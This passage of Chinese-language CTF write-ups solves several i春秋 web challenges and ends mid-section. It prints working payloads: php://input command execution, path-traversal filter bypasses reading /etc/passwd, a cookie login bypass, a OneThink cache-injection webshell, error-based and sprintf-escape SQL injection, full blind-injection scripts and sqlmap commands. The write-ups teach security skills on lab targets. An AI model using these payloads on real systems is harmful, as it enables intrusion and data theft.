  2195. 执行php列出网站目录文件的代码,发现列出的文件dle345aae.php和flag有很大关联性。
  2196. http://ea072f427dc1435a8c8386c81e62c9948e892d4a196a4bd4.changame.ichunqiu.com?path=php://input
  2197. post:
  2198. <?php echo system('ls');?>
  2199. 利用?path=/var/www/html/dle345aae.php包含
  2200. dle345aae.php文件并读取其内容, 但是页面和源码没有任何输出
  2201. http://ea072f427dc1435a8c8386c81e62c9948e892d4a196a4bd4.changame.ichunqiu.com/?path=/var/www/html/dle345aae.php
  2202. 使用php://filter协议查看dle345aae.php文件的内容,因为PHP文件不能直接显示内容所以先base64显示出来,然后再解码。
  2203. php://filter 可以用于读取文件源代码,有的时候代码输出会被执行,可以使用base64加密的方式输出。
  2204. 使用?path=php://filter/read=convert.base64-encode/resource=dle345aae.php读取文件dle345aae.php base64内容,得到base64的falg值
  2205. http://ea072f427dc1435a8c8386c81e62c9948e892d4a196a4bd4.changame.ichunqiu.com/?path=php://filter/read=convert.base64-encode/resource=dle345aae.php
  2206. 得到base64的flag值:PD9waHAgCiRmbGFnPSJmbGFnezk4NjYwZDIyLTNiY2ItNGUwMC1iMGJiLTc2NGQ1NzI4YzQxOH0iOwo=
  2207. 解密base64得到内容:
  2208. <?php
  2209. $flag="flag{98660d22-3bcb-4e00-b0bb-764d5728c418}";
  2210. 最终flag:
  2211. flag{98660d22-3bcb-4e00-b0bb-764d5728c418}
  2212. 题目名称:Zone
  2213. 题目内容:网站要上线了,还没测试呢,怎么办题目writeup:启动题目场景,获得靶场网站,访问网站发现是一个登陆页面,这里爆破无果。http://37f676bc7c03443ebe20d9a4b8fbd8d60dd58a2b9a2d40e8.changame.ichunqiu.com/login.php
  2214. 点击Mini-Zone,并通过burpsuit抓包,发现 cookie中的login=0有点特别,猜测修改其值,可逻辑绕过后台登录。
  2215. 那么我们尝试将cookie 中login修改为1,并发送数据,可成功看到登录后台主页
  2216. 先点击
  2217. Mini-Zone链接,然后拦截抓包,并将修改为login=1,forward释放拦截包,即可绕过后台登录。
  2218. 可以看到成功等到后台
  2219. 点击后台管理页面中Manage链接,然后修改
  2220. 为login=1,forward释放拦截包,可跳转到一个新的链接地址。
  2221. 该链接地址为:http://37f676bc7c03443ebe20d9a4b8fbd8d60dd58a2b9a2d40e8.changame.ichunqiu.com/manages/admin.php?module=index&name=php
  2222. 该链接地址中的
  2223. ?module=参数看起来是存在任意文件包含漏洞
  2224. 这里通过文件包含读取
  2225. etc/passwd内容,发现无法读取,猜测../可能被过滤了。
  2226. http://37f676bc7c03443ebe20d9a4b8fbd8d60dd58a2b9a2d40e8.changame.ichunqiu.com/manages/admin.php?module=../../../etc/passwd&name=php
  2227. 输入/manages/admin.php?module=ind../ex&name=php发现页面正常显示后台内容,于是猜想../被过滤了
  2228. http://37f676bc7c03443ebe20d9a4b8fbd8d60dd58a2b9a2d40e8.changame.ichunqiu.com/manages/admin.php?module=ind../ex&name=php
  2229. 所以将../改为..././,于是访问/manages/admin.php?module=..././..././..././etc/passwd&name=txt,可以正常读取/etc/passwd内容
  2230. http://37f676bc7c03443ebe20d9a4b8fbd8d60dd58a2b9a2d40e8.changame.ichunqiu.com/manages/admin.php?module=..././..././..././etc/passwd&name=txt
  2231. 访问不存在的目录,发现该系统中间件服务器为nginx
  2232. http://37f676bc7c03443ebe20d9a4b8fbd8d60dd58a2b9a2d40e8.changame.ichunqiu.com/11
  2233. linux下nginx的默认配置路径为:/etc/nginx/nginx.conf
  2234. 通过文件包含读取nginx配置文件/etc/nginx/nginx.conf内容,可以正常读取,且包含了网站的物理路径配置文件名,文件名为sites-enabled/default
  2235. http://37f676bc7c03443ebe20d9a4b8fbd8d60dd58a2b9a2d40e8.changame.ichunqiu.com/manages/admin.php?module=..././..././..././etc/nginx/nginx.conf&name=txt
  2236. 通过文件包含读取nginx网站物理路径配置文件sites-enabled/default内容,该配置文件默认路径为:/etc/nginx/sites-enabled/default
  2237. 可正常读取其内容,且网站的物理路径为/var/www/html以及autoindex on开启了目录预览功能,可目录遍历/online-movies目录。
  2238. http://37f676bc7c03443ebe20d9a4b8fbd8d60dd58a2b9a2d40e8.changame.ichunqiu.com/manages/admin.php?module=..././..././..././etc/nginx/sites-enabled/default&name=txt
  2239. 遍历/
  2240. online-movies目录
  2241. http://37f676bc7c03443ebe20d9a4b8fbd8d60dd58a2b9a2d40e8.changame.ichunqiu.com/online-movies/
  2242. 使用../进行上级目录遍历,可遍历到/online-movies../var/www/目录,但是点击html目录就下载 index.php
  2243. /online-movies被替换成
  2244. /online-movies/
  2245. /online-movies../被替换成/online-movies/../
  2246. http://37f676bc7c03443ebe20d9a4b8fbd8d60dd58a2b9a2d40e8.changame.ichunqiu.com/online-movies../var/www/
  2247. 这时候我们根据配置文件里的其他信息可以知道/var/www/html是根目录
  2248. 访问robost.txt.发现flag.php文件可以访问,那么flag就存在flag.php中,且flag.php保存在默认根目录/var/www/html下
  2249. 因此我们访问/var/www/html/flag.php就可以得到flag.php源码,如果是文件就可以直接被下载。t本地通过记事本可以直接查看flag的内容:
  2250. http://37f676bc7c03443ebe20d9a4b8fbd8d60dd58a2b9a2d40e8.changame.ichunqiu.com/online-movies../var/www/html/flag.php
  2251. 最终flag:
  2252. flag{7d5081e9-8c46-44d8-92d8-20357d5862f0}
  2253. 题目名称:OneThink
  2254. 题目内容:利用已知的漏洞拿shell吧
  2255. 题目writeup:
  2256. 启动题目场景,获得靶场网站,访问网站,可以看到该网站的CMS框架是oneThink1.0
  2257. http://8887503b1f8f45d08800178afa836ba11670a380fd1f40f4.changame.ichunqiu.com/
  2258. 根据题目提示是利用已知的漏洞拿shell,于是搜索onethink1.0漏洞,找到
  2259. OneThink CMS的缓存漏洞的分析
  2260. 在注册页面,首先注册一个账号%0aphpinfo();#
  2261. http://8887503b1f8f45d08800178afa836ba11670a380fd1f40f4.changame.ichunqiu.com/index.php?s=/home/user/register.html
  2262. 通过bupsuit对其抓包拦截
  2263. 并将%0a进行二次url decode,以换行了为准,这里%oa是换行符的意思,缓存到文件的时候起换行作用,然后点击forward,释放拦截
  2264. 可以看到成功注册(需要注意验证码填入正确)
  2265. 在登录页面输入用户名%0aphpinfo();# 密码123456登录系统,并对其进行抓包。然后将
  2266. %0a进行二次url decode,并点击foreard,成功登录系统
  2267. 访问Runtime/Temp/2bb202459c30a1628513f40ab22fa01a.php路径文件,会发现phpinfo()被解析 ,文件名是固定不变的。缓存内容放到MD5(sys_active_user_list).php中。
  2268. http://8887503b1f8f45d08800178afa836ba11670a380fd1f40f4.changame.ichunqiu.com/Runtime/Temp/2bb202459c30a1628513f40ab22fa01a.php
  2269. 就是注册个账号为:%0a$a=$_GET[a];//%0aecho `$a`;// 就可以getshell,但是提示注册长度最多16个字符
  2270. 所以分别注册2个账号:
  2271. 账号一:%0a$a=$_GET[a];//
  2272. 账号二:%0aecho `$a`;//
  2273. 注册账号%0a$a=$_GET[a];//,并抓包,对%0a进行2次url编码,然后forward
  2274. 注册账号%0aecho `$a`;//,并抓包,对%0a进行2次url编码,然后forward
  2275. 登录%0a$a=$_GET[a];并抓包,对%0a进行2次url编码,然后forward
  2276. 登录%0aecho `$a`;//并抓包,对%0a进行2次url编码,然后forward
  2277. 访问Runtime/Temp/2bb202459c30a1628513f40ab22fa01a.php?a=ls ../../目录遍历并查看源码来查找flag,发现flag 在../../flag.php中
  2278. view-source:http://8887503b1f8f45d08800178afa836ba11670a380fd1f40f4.changame.ichunqiu.com/Runtime/Temp/2bb202459c30a1628513f40ab22fa01a.php?a=ls%20%20../../
  2279. 访问Runtime/Temp/2bb202459c30a1628513f40ab22fa01a.php?a=cat ../../flag.php 获取flag
  2280. view-source:http://8887503b1f8f45d08800178afa836ba11670a380fd1f40f4.changame.ichunqiu.com/Runtime/Temp/2bb202459c30a1628513f40ab22fa01a.php?a=cat%20../../flag.php
  2281. 最终flag:
  2282. flag{eb2966bf-be7f-4b26-a40a-be39d73d775c}
  2283. 题目名称:Upload
  2284. 题目内容:来来来,都是套路,贼简单
  2285. 题目writeup:
  2286. 启动题目场景获得靶场网站,访问网站,发现页面内容显示"should be a fast man"
  2287. http://353031f6ec9345fea9837b173f8365ed11320213f0614abd.changame.ichunqiu.com/
  2288. 对其主页查看源码,注释中显示需要提交post访问且参数为ichunqiu。
  2289. view-source:http://353031f6ec9345fea9837b173f8365ed11320213f0614abd.changame.ichunqiu.com/
  2290. 在firefox浏览器中构造post参数:
  2291. ichunqiu=111(参数任意)
  2292. 然后对其buspuit抓包,发送请求,发现响应包的http头部中包含flag关键字
  2293. 但是每次发送相同的post数据包,响应头中的flag值不一样
  2294. 对其flag的base64字符进行解密,发现解密后的字符都是不相同
  2295. 根据上文中响应页面内容中显示be a fast man,就是说我们请求的速度不够快,因此不能获取到正确的值。
  2296. 编写脚本获得:
  2297. import base64,requests
  2298. def main():
  2299.     a = requests.session()
  2300.     b = a.get("http://353031f6ec9345fea9837b173f8365ed11320213f0614abd.changame.ichunqiu.com/")
  2301.     key1 = b.headers["flag"]
  2302.     c = base64.b64decode(key1)
  2303.     d = str(c).split(':')
  2304.     key = base64.b64decode(d[1])
  2305.     body = {"ichunqiu":key}
  2306.     f = a.post("http://353031f6ec9345fea9837b173f8365ed11320213f0614abd.changame.ichunqiu.com/",data=body)
  2307.     print f.text
  2308. if __name__ == '__main__':
  2309.     main()
  2310. 得到正确值:
  2311. Path:3712901a08bb58557943ca31f3487b7d
  2312. 根据得到的值,可以看出这个值为路径地址
  2313. 3712901a08bb58557943ca31f3487b7d。
  2314. 于是访问3712901a08bb58557943ca31f3487b7d路径,发现页面内容显示一个超链接“welcome@QAQ"
  2315. http://353031f6ec9345fea9837b173f8365ed11320213f0614abd.changame.ichunqiu.com/3712901a08bb58557943ca31f3487b7d
  2316. 点击超链接,显示了一个登陆页面
  2317. http://353031f6ec9345fea9837b173f8365ed11320213f0614abd.changame.ichunqiu.com/3712901a08bb58557943ca31f3487b7d/action.php?action=login
  2318. 通过dirsearch.py对网站根目录进行目录扫描,只发现主页和登录页面。
  2319. python3  dirsearch.py   -u  http://353031f6ec9345fea9837b173f8365ed11320213f0614abd.changame.ichunqiu.com/
  2320. 再次通过direarch.py对网站的
  2321. 3712901a08bb58557943ca31f3487b7d进行目录扫描,发现存在.svn敏感信息泄露
  2322. python3  dirsearch.py   -u  http://353031f6ec9345fea9837b173f8365ed11320213f0614abd.changame.ichunqiu.com/3712901a08bb58557943ca31f3487b7d/
  2323. 通过snv图像化下载工具,发现并没有可下载的,尝试访问svn目录下存在的默认wc.db,可直接访问
  2324. http://353031f6ec9345fea9837b173f8365ed11320213f0614abd.changame.ichunqiu.com/3712901a08bb58557943ca31f3487b7d/.svn/wc.db
  2325. 得到用户名为:
  2326. md5(HEL1OW10rDEvery0n3)=8638d5263ab0d3face193725c23ce095
  2327. 观察登录页面得知 captcha 经过 MD5 之后的前六位为:159f69, 所以需要先求得对应的 captcha 才能提交.写爆破验证码的脚本
  2328. import hashlibdef md5(s): return hashlib.md5(str(s).encode('utf-8')).hexdigest()def main(s): for i in range(1,99999999): if md5(i)[0:6] == str(s): print(i) exit(0)if __name__ == '__main__': main("159f69")
  2329. 得到
  2330. 验证码:
  2331. 27521218
  2332. 登录页面输入用户名: 8638d5263ab0d3face193725c23ce095,密码: 123(任意),验证码:27521218
  2333. 点击 Submit 提交,发现窗口弹出显示7815696ecbf1c96e6894b779456d330e.php
  2334. 访问
  2335. 7815696ecbf1c96e6894b779456d330e.php文件路径,得到一个文件上传页面
  2336. http://353031f6ec9345fea9837b173f8365ed11320213f0614abd.changame.ichunqiu.com/3712901a08bb58557943ca31f3487b7d/7815696ecbf1c96e6894b779456d330e.php
  2337. 上传一句话php木马图片马,可成功上传
  2338. 上传其他的.pht,可获得flag
  2339. 最终flag:
  2340. flag{3d9300a6-1967-48a5-b0d1-d14c3484d2fa}
  2341. 题目名称:Some Words
  2342. 题目内容:find the flag
  2343. 题目writeup:
  2344. 启动题目场景,获得靶场网站,访问网站,发现网站是一个博客
  2345. http://24a34cfb3d544653a7a1e0cb65fc89837e5c99478451420b.changame.ichunqiu.com/index.php#
  2346. 点击我的消息,出现的id值猜测存在sql注入
  2347. http://24a34cfb3d544653a7a1e0cb65fc89837e5c99478451420b.changame.ichunqiu.com/index.php?id=1
  2348. 加单引号,页面报错,显示是mysql数据库
  2349. http://24a34cfb3d544653a7a1e0cb65fc89837e5c99478451420b.changame.ichunqiu.com/index.php?id=1%E2%80%99
  2350. 测试and 1,
  2351. 发现and被过滤了
  2352. http://030f75b2c48a4f82879a1064ebf9ca869ec6fd87695b4261.changame.ichunqiu.com/index.php?id=1  and 1
  2353. 测试or 1,发现or 1可用,因为1 or 1 的结果是1,所以显示的结果是和id=1是一样的
  2354. http://030f75b2c48a4f82879a1064ebf9ca869ec6fd87695b4261.changame.ichunqiu.com/index.php?id=1  or 1
  2355. 报错查询数据库
  2356. http://24a34cfb3d544653a7a1e0cb65fc89837e5c99478451420b.changame.ichunqiu.com/index.php?id=updatexml(1,concat(0x7e,(select database()),0x7e),1)
  2357. http://030f75b2c48a4f82879a1064ebf9ca869ec6fd87695b4261.changame.ichunqiu.com/index.php?id=1 or 1=1
  2358. 说明=已经被过滤
  2359. http://030f75b2c48a4f82879a1064ebf9ca869ec6fd87695b4261.changame.ichunqiu.com/index.php?id=1 or 1>0
  2360. 测试<和>发现可以使用
  2361. 经过测试,发现题目拦截了union select,and,=等关键字,但是没有拦截select mid from ascii等关键字,可以利用updexml()函数报错
  2362. 报错查询数据库,得到数据库名为words
  2363. ?id=updatexml(1,concat(0x7e,(select database()),0x7e),1)
  2364. http://030f75b2c48a4f82879a1064ebf9ca869ec6fd87695b4261.changame.ichunqiu.com/index.php?id=updatexml(1,concat(0x7e,(select database()),0x7e),1)
  2365. 或者
  2366. 在报错注入中还有一种简单的方式判断当前数据库即构造?id=a()
  2367. 该句表示在words数据库中不存在a表
  2368. 一次输入以下函数得到的返回值:
  2369. user() XPATH syntax error: '~root@localhost~'
  2370. database() XPATH syntax error: '~words~'
  2371. version() XPATH syntax error: '~5.5.57-0ubuntu0.14.04.1~'
  2372. @@datadir XPATH syntax error: '~/var/lib/mysql/~'
  2373. 查查看表的数量,得到表的数量为83
  2374. ?id=updatexml(1,concat(0x7e,(select count(*) from information_schema.tables ),0x7e),1) http://24a34cfb3d544653a7a1e0cb65fc89837e5c99478451420b.changame.ichunqiu.com/index.php?id=updatexml(1,concat(0x7e,(select count(*) from information_schema.tables ),0x7e),1)
  2375. 查找到 flag所在的表名,
  2376. 爆破到83,显示fl4g就是flag的表名
  2377. ?id=updatexml(1,concat(0x7e,(select table_name from information_schema.tables limit 1,1),0x7e),1)
  2378. ?id=updatexml(1,concat(0x7e,(select table_name from information_schema.tables limit 83,1),0x7e),1)
  2379. http://24a34cfb3d544653a7a1e0cb65fc89837e5c99478451420b.changame.ichunqiu.com/index.php?id=updatexml(1,concat(0x7e,(select table_name from information_schema.tables limit 83,1),0x7e),1)
  2380. 查找表的数量,得到表的数量为811
  2381. ?id=updatexml(1,concat(0x7e,(select count(*) from information_schema.columns ),0x7e),1)
  2382. http://24a34cfb3d544653a7a1e0cb65fc89837e5c99478451420b.changame.ichunqiu.com/index.php?id=updatexml(1,concat(0x7e,(select count(*) from information_schema.columns ),0x7e),1)
  2383. 查找flag所在的字段,可通过二分爆破法进行爆破,这里最多爆破400次就被系统WAF拦截。爆破到808,显示fl4g就是flag的字段名
  2384. ?id=updatexml(1,concat(0x7e,(select column_name from information_schema.columns limit 0,1),0x7e),1)
  2385. ?id=updatexml(1,concat(0x7e,(select column_name from information_schema.columns limit 811,1),0x7e),1)http://24a34cfb3d544653a7a1e0cb65fc89837e5c99478451420b.changame.ichunqiu.com/index.php?id=updatexml(1,concat(0x7e,(select column_name from information_schema.columns limit 808,1),0x7e),1)
  2386. 查找f14g字段的内容,发现flag的字段不全
  2387. ?id=updatexml(1,concat(0x7e,(select f14g from f14g),0x7e),1)
  2388. http://24a34cfb3d544653a7a1e0cb65fc89837e5c99478451420b.changame.ichunqiu.com/index.php?id=updatexml(1,concat(0x7e,(select f14g from f14g),0x7e),1)
  2389. 得到前一大部分的flag:
  2390. flag{dcef7c2d-45cf-4f4e-bdbb-d6
  2391. 既然flag字段显示不全,于是想到利用sql语句的另一个函数reverse(),该函数可以颠倒数组中的顺序
  2392. ?id=updatexml(1,concat(reverse((select f14g from f14g))),1)
  2393. 得到的值:}e8702f1e646d-bbdb-e4f4-fc54-d2c
  2394. 那取反得到后一小部分flag:
  2395. c2d-54fc-4f4e-bdbb-d646e1f2078e}
  2396. 最终得到flag:
  2397. flag{dcef7c2d-45cf-4f4e-bdbb-d646e1f2078e}
  2398. 题目名称:“迎圣诞,拿大奖”活动赛题---SQLi
  2399. 题目内容:find the flag.
  2400. 题目writeup:
  2401. 启动题目场景,获得靶场网站,访问网站,页面是一个登陆页面。
  2402. http://0ef5d71d46ff4873bd0cc981e50c3df3c68ab46c7f474a32.changame.ichunqiu.com/
  2403. 根据题目名称
  2404. SQLi,猜测该题是一道SQL注入,那么我参数在登录窗口中输入用户名 admin,密码admin,提交并通过bupsuit对其抓包,发送请求,在响应页面中显示密码错误,那么猜测用户名admin是存在于网站中。
  2405. username=admin&password=admin
  2406. 使用Burp Suite的intruder功能加载常用的键盘符号作为字典来fuzz 系统的waf测试,发现username是admin%的时候报错
  2407. 报错的内容为sprint().
  2408. 这里出现sprintf函数警告,查资料了解到,sprintf函数存在格式化字符串逃逸漏洞,由报错可以看出sprintf参数少于%的个数,需要使用占位符的写法,%1$可以逃逸引号的转义;
  2409. 了解后,我们令username是admin%1\$’ and 1=1%23和admin%1$’ and 1=2%23来判断注入为什么这样呢?因为放到sprintf里面的字符可能会在之前被转义了,因此我们利用%1$把分号转义出的\吃掉,就可以成功闭合,然后在后面实现注入了。
  2410. sprintf格式化字符串所引起的漏洞,具体原理可以参考下面这篇文章:https://blog.csdn.net/WQ_BCJ/article/details/8505744(解析php sprintf函数漏洞)
  2411. 测试:
  2412. admin%1\$’ and 1=1%23
  2413. username=admin%1$\' and 1=1%23&password=admin
  2414. 结果返回了username error!,按照一开始的测试来说,若and 1=1执行成功应该会返回password error!猜测and被过滤了,下面换成or语句测试
  2415. 测试 admin%1$\' or 1=1%23
  2416. username=admin%1$\'  or  1=1%23&password=admin
  2417. 结果返回了password error
  2418. 测试:
  2419. admin%1$\'  or  1=2%23
  2420. username=admin%1$\'  or  1=2%23&password=admin
  2421. 结果返回了username error
  2422. 若第一个提示password error,第二个提示username error则说明此处存在注入
  2423. 看到sprintf函数时,我们就应该想到php的字符串格式化逃逸漏洞,这个漏洞导致的结果是会将%1$/’ 变为 ’ ,也就是说绕过了单引号的转换,一般情况下sql语句中的单引号都会被转换为\’ ,这不利于我们进行单引号的闭合,借此漏洞,我们完成对sql语句的注入.
  2424. * 由于该页面的响应只有两种,没有显位,即没有回显,我们无法直接通过页面的显示来得到数据库内容,那么就只有通过布尔值盲注了。
  2425. * 布尔值无法用手工完成,要靠脚本完成,脚本如下:
  2426. 方法一:
  2427. 查看当前数据库的长度:
  2428. #coding:utf-8
  2429. import requests
  2430. import string
  2431. dic = string.digits + string.ascii_letters + "!@#$%^&*()_+{}-="
  2432. right = 'password error!'
  2433. worry = 'username error!'
  2434. url = 'http://ad38630038fd4c87bd8e55c7bd876412d064d626a2e64cae.game.ichunqiu.com/'
  2435. for i in range(30):
  2436.     key = "admin%1$\\' or " + "(length(database())=" + str(i) + ")#"
  2437.     data = {'username':key, 'password':'111'}
  2438.     r = requests.post(url, data=data).content
  2439.     if right in str(r):
  2440.         print('the length of database is %s' %i)
  2441. 得到数据库的长度为3
  2442. 查询数据库名称:
  2443. # coding=utf-8# Data: 2021/8/20 11:10# File : database.pyimport requestsimport stringdic = string.digits + string.ascii_letters + "!@#$%^&*()_+{}-="right = 'password error!'worry = 'username error!'url = 'http://0ef5d71d46ff4873bd0cc981e50c3df3c68ab46c7f474a32.changame.ichunqiu.com/'database = ''for j in range(1,4): for each in dic: key = "admin%1$\\' or " + "(ascii(substr(database(),%s,1))="%j + str(ord(each)) + ")#" data = {'username':key, 'password':'111'} r = requests.post(url, data=data).content print(key) if right in str(r): database += each print(each) breakprint('the name of database is %s'%database)
  2444. 得到数据库名:ctf
  2445. 脚本跑出表的长度:
  2446. # coding=utf-8# Data: 2021/8/20 11:11# File : tabe_length.pyimport requestsimport stringdic = string.digits + string.ascii_letters + "!@#$%^&*()_+{}-="right = 'password error!'worry = 'username error!'url = 'http://0ef5d71d46ff4873bd0cc981e50c3df3c68ab46c7f474a32.changame.ichunqiu.com/'i = 1while True: key = "admin%1$\\' or " + "(select length(table_name) from information_schema.tables where table_schema=database() limit 0,1)=" + str(i) + "#" data = {'username':key, 'password':'111'} r = requests.post(url, data=data).content print(r) if right in str(r): print('the length of tables is %s' %i) break i += 1
  2447. 得到表的长度为4
  2448. 脚本跑出表名:
  2449. # coding=utf-8# Data: 2021/8/20 11:13# File : tabe.pyimport requestsimport stringdic = string.digits + string.ascii_letters + "!@#$%^&*()_+{}-="right = 'password error!'worry = 'username error!'url = 'http://0ef5d71d46ff4873bd0cc981e50c3df3c68ab46c7f474a32.changame.ichunqiu.com/'table = ''for i in range(1,5): for j in dic: key = "admin%1$\\' or " + "(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),%s,1))="%i + str(ord(j)) + ")#" data = {'username':key, 'password':'111'} r = requests.post(url, data=data).content print(key) if right in str(r): table += j print(j) breakprint('the name of table is %s'%table)
  2450. 得到表名为flag
  2451. 脚本跑出字段长度:
  2452. # coding=utf-8# Data: 2021/8/20 11:14# File : columns_length.pyimport requestsimport stringdic = string.digits + string.ascii_letters + "!@#$%^&*()_+{}-="right = 'password error!'worry = 'username error!'url = 'http://0ef5d71d46ff4873bd0cc981e50c3df3c68ab46c7f474a32.changame.ichunqiu.com/'i = 1while True: key = "admin%1$\\' or " + "(select length(column_name) from information_schema.columns where table_name=0x666c6167 limit 0,1)=" + str(i) + "#" data = {'username':key, 'password':'111'} r = requests.post(url, data=data).content print(r) if right in str(r): print('the length of columns is %s' %i) break i += 1
  2453. 得到字段长度为4
  2454. 脚本跑出字段名称:
  2455. # coding=utf-8# Data: 2021/8/20 11:14# File : columns.pyimport requestsimport stringdic = string.digits + string.ascii_letters + "!@#$%^&*()_+{}-="right = 'password error!'worry = 'username error!'url = 'http://0ef5d71d46ff4873bd0cc981e50c3df3c68ab46c7f474a32.changame.ichunqiu.com/'column = ''for i in range(1,5): for j in dic: key = "admin%1$\\' or " + "(ascii(substr((select column_name from information_schema.columns where table_name=0x666c6167 limit 0,1),%s,1))="%i + str(ord(j)) + ")#" data = {'username':key, 'password':'111'} r = requests.post(url, data=data).content print(key) if right in str(r): column += j print(j) breakprint('the name of column is %s'%column)
  2456. 得到字段名称为flag
  2457. 脚本跑出字段内容长度:
  2458. # coding=utf-8# Data: 2021/8/20 11:22# File : data_length.pyimport requestsimport stringdic = string.digits + string.ascii_letters + "!@#$%^&*()_+{}-="right = 'password error!'worry = 'username error!'url = 'http://0ef5d71d46ff4873bd0cc981e50c3df3c68ab46c7f474a32.changame.ichunqiu.com/'i = 1while True: key = "admin%1$\\' or " + "(select length(flag) from flag limit 0,1)=" + str(i) + "#" data = {'username':key, 'password':'111'} r = requests.post(url, data=data).content print(key) if right in str(r): print('the length of data is %s' %i) break i += 1
  2459. 数据长度为42
  2460. 脚本跑出字段内容:
  2461. # coding=utf-8# Data: 2021/8/20 11:24# File : data.pyimport requestsimport stringdic = string.digits + string.ascii_letters + "!@#$%^&*()_+{}-="right = 'password error!'worry = 'username error!'url = 'http://0ef5d71d46ff4873bd0cc981e50c3df3c68ab46c7f474a32.changame.ichunqiu.com/'flag = ''for i in range(1,43): for j in dic: key = "admin%1$\\' or " + "(ascii(substr((select flag from flag limit 0,1),%s,1))="%i + str(ord(j)) + ")#" data = {'username':key, 'password':'111'} r = requests.post(url, data=data).content print(key) if right in str(r): flag += j print(j) breakprint('the flag is %s'%flag)
  2462. 得到flag:
  2463. flag{b5b36121-86dd-a4db-aab3-86ddb749dfa1}
  2464. 也可以将上面的每个脚本整合成一个脚本,跑出flag:
  2465. #coding:utf-8import requestsimport stringdef boom(): url = r'http://0ef5d71d46ff4873bd0cc981e50c3df3c68ab46c7f474a32.changame.ichunqiu.com/' s = requests.session() #会话对象requests.Session能够跨请求地保持某些参数,比如cookies,即在同一个Session实例发出的所有请求都保持同一个cookies,而requests模块每次会自动处理cookies,这样就很方便地处理登录时的cookies问题。 dic = string.digits + string.letters + "!@#$%^&*()_+{}-=" right = 'password error!' error = 'username error!' lens = 0 i = 0 #确定当前数据库的长度 while True: payload = "admin%1$\\' or " + "length(database())>" + str(i) + "#" data={'username':payload,'password':1} r = s.post(url,data=data).content if error in r: lens=i break i+=1 pass print("[+]length(database()): %d" %(lens)) #确定当前数据库的名字 strs='' for i in range(lens+1): for c in dic: payload = "admin%1$\\' or " + "ascii(substr(database()," + str(i) +",1))=" + str(ord(c)) + "#" data = {'username':payload,'password':1} r = s.post(url,data=data).content if right in r: strs = strs + c print strs break pass pass print("[+]database():%s" %(strs)) lens=0 i = 1 while True: payload = "admin%1$\\' or " + "(select length(table_name) from information_schema.tables where table_schema=database() limit 0,1)>" + str(i) + "#" #对当前的数据库,查询第一个表的长度 data = {'username':payload,'password':1} r = s.post(url,data=data).content if error in r: lens = i break i+=1 pass print("[+]length(table): %d" %(lens)) #查询第一个表的名称 strs='' for i in range(lens+1): for c in dic: payload = "admin%1$\\' or " + "ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1)," + str(i) +",1))=" + str(ord(c)) + "#" # 数字一定要str才可以传入 data = {'username':payload,'password':1} r = s.post(url,data=data).content if right in r: strs = strs + c print strs break pass pass print("[+]table_name:%s" %(strs)) tablename = '0x' + strs.encode('hex') #编码为16进制 table_name = strs lens=0 i = 0 while True: payload = "admin%1$\\' or " + "(select length(column_name) from information_schema.columns where table_name = " + str(tablename) + " limit 0,1)>" + str(i) + "#" data = {'username':payload,'password':1} r = s.post(url,data=data).content if error in r: lens = i break i+=1 pass print("[+]length(column): %d" %(lens)) strs='' for i in range(lens+1): for c in dic: payload = "admin%1$\\' or " + "ascii(substr((select column_name from information_schema.columns where table_name = " + str(tablename) +" limit 0,1)," + str(i) + ",1))=" + str(ord(c)) + "#" data = {'username':payload,'password':1} r = s.post(url,data=data).content if right in r: strs = strs + c print strs break pass pass print("[+]column_name:%s" %(strs)) column_name = strs num=0 i = 0 while True: payload = "admin%1$\\' or " + "(select count(*) from " + table_name + ")>" + str(i) + "#" data = {'username':payload,'password':1} r = s.post(url,data=data).content if error in r: num = i break i+=1 pass print("[+]number(column): %d" %(num)) lens=0 i = 0 while True: payload = "admin%1$\\' or " + "(select length(" + column_name + ") from " + table_name + " limit 0,1)>" + str(i) + "#" data = {'username':payload,'password':1} r = s.post(url,data=data).content if error in r: lens = i break i+=1 pass print("[+]length(value): %d" %(lens)) i=1 strs='' for i in range(lens+1): for c in dic: payload = "admin%1$\\' or ascii(substr((select flag from flag limit 0,1)," + str(i) + ",1))=" + str(ord(c)) + "#" data = {'username':payload,'password':'1'} r = s.post(url,data=data).content if right in r: strs = strs + c print strs break pass pass print("[+]flag:%s" %(strs))if __name__ == '__main__': boom() print 'Finish!'
  2466. 方法二:
  2467. 通过sqlmap添加前缀的参数:–prefix="%1$’",以及注入点为username,跑出ueranme存在注入
  2468. 这里data.txt数据为:
  2469. POST / HTTP/1.1
  2470. Host: 9c4a7e6bb03140e49c97bf6bf83c4b1770ed55845df24dd4.changame.ichunqiu.com
  2471. User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0.1
  2472. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  2473. Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
  2474. Accept-Encoding: gzip, deflate
  2475. Referer: http://9c4a7e6bb03140e49c97bf6bf83c4b1770ed55845df24dd4.changame.ichunqiu.com/
  2476. Cookie: __jsluid_h=f61e08c2eb093e133773dca6a57b7307
  2477. Content-Type: application/x-www-form-urlencoded
  2478. Content-Length: 29
  2479. Connection: close
  2480. username=admin&password=admin
  2481. python sqlmap.py -r data.txt --prefix="%1$\'" -p username
  2482. 爆数据库
  2483. python sqlmap.py -r data.txt --prefix="%1$\'" -p username --dbs
  2484. 爆表
  2485. python sqlmap.py -r data.txt --prefix="%1$\'" -p username --tables -D "ctf"
  2486. 爆字段
  2487. python sqlmap.py -r data.txt --prefix="%1$\'" -p username --columns -T "flag" -D "ctf" --dump
  2488. 最终得到flag:
  2489. flag{b5b36121-86dd-a4db-aab3-86ddb749dfa1}
  2490. 题目名称:Do you know upload?
  2491. 题目内容:加油吧,少年
  2492. 题目wirtup:
  2493. 启动题目场景,获得靶场网站,访问网站,发现页面是一个文件上传页面。
  2494. 对其页面查看源码,在注释中通过file变量进行文件包含,于是想到php://input和php://filter/read=convert.base64-encode/resource=index.php
  2495. 通过php:filter伪协议进行文件包含index.php得到其内容
  2496. http://25126d4501084fe195d203e9d30e4786cfdbb36527ac4d13.changame.ichunqiu.com/?file=php://filter/read=convert.base64-encode/resource=index.php
  2497. 得到base64内容:
